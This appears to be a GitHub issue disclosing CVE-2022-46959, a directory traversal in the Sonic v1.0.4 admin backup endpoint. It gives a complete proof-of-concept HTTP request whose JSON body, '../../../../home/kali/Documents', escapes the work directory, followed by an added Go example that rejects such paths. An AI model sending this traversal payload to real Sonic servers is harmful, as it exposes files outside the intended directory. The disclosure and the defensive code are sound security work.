CVE-2022-46959: Back up files in any directory through directory traversal · Issue #56 · go-sonic/sonic
An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.
Prerequisite: the attacker must be logged in to the admin backend.
Back up files in any directory through directory traversal
POST /api/admin/backups/work-dir HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 35
Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

["../../../../home/kali/Documents"]
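
A containment check of the kind this endpoint needs, as an added example (not code from the original issue and not the go-sonic project's own fix). The function names and the work directory /opt/sonic are assumptions made for the demo; the second sample body is the one from the request above.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var errOutsideBase = errors.New("path escapes work directory") // hypothetical sentinel error

// resolveInside joins rel onto base and rejects any result that lands outside base.
func resolveInside(base, rel string) (string, error) {
	if filepath.IsAbs(rel) {
		return "", errOutsideBase
	}
	full := filepath.Join(base, rel) // Join also cleans "..", "." and duplicate separators
	r, err := filepath.Rel(base, full)
	if err != nil || r == ".." || strings.HasPrefix(r, ".."+string(filepath.Separator)) {
		return "", errOutsideBase
	}
	return full, nil
}

// validateBackupRequest parses the JSON array body; one escaping entry fails the whole request.
func validateBackupRequest(base string, body []byte) ([]string, error) {
	var items []string
	if err := json.Unmarshal(body, &items); err != nil {
		return nil, fmt.Errorf("invalid body: %w", err)
	}
	out := make([]string, 0, len(items))
	for _, it := range items {
		p, err := resolveInside(base, it)
		if err != nil {
			return nil, fmt.Errorf("%q: %w", it, err)
		}
		out = append(out, p)
	}
	return out, nil
}

func main() {
	base := "/opt/sonic" // constructed work directory for the demo
	for _, body := range []string{`["upload","conf/config.yaml"]`, `["../../../../home/kali/Documents"]`} {
		paths, err := validateBackupRequest(base, []byte(body))
		fmt.Println(body, "->", paths, err)
	}
}
```

The check is lexical only; if the work directory can contain symlinks, resolve them (for example with filepath.EvalSymlinks) before comparing.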
Related news
GHSA-2x48-p6cq-5xcw: Path Traversal in github.com/go-sonic/sonic